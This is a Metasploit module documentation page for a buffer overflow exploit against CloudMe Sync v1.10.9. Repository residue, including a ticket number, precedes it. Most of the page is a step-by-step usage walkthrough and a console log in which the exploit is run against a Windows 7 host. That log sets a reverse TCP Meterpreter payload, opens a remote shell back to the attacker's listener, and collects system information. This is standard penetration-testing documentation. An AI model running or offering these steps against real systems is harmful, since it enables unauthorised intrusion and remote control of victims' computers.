a23240a742
[ticket: #9594]
1.4 KiB
1.4 KiB
Description
This module exploits a buffer overflow vulnerability in CloudMe Sync v1.10.9.
Verification Steps
- Install CloudMe for Desktop version
v1.10.9 - Start the applicaton (you don't need to create an account)
- Start
msfconsole - Do
use exploit/windows/misc/cloudme_sync - Do
set RHOST ip - Do
set LHOST ip - Do
exploit - Verify the Meterpreter session is opened
Scenarios
CloudMe Sync client application on Windows 7 SP1 x86
msf > use exploit/windows/misc/cloudme_sync
msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148
RHOST => 172.16.40.148
msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(windows/misc/cloudme_sync) > exploit
[*] Started reverse TCP handler on 172.16.40.5:4444
[*] Sending stage (179779 bytes) to 172.16.40.148
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000
meterpreter > sysinfo
Computer : PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : pt_PT
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >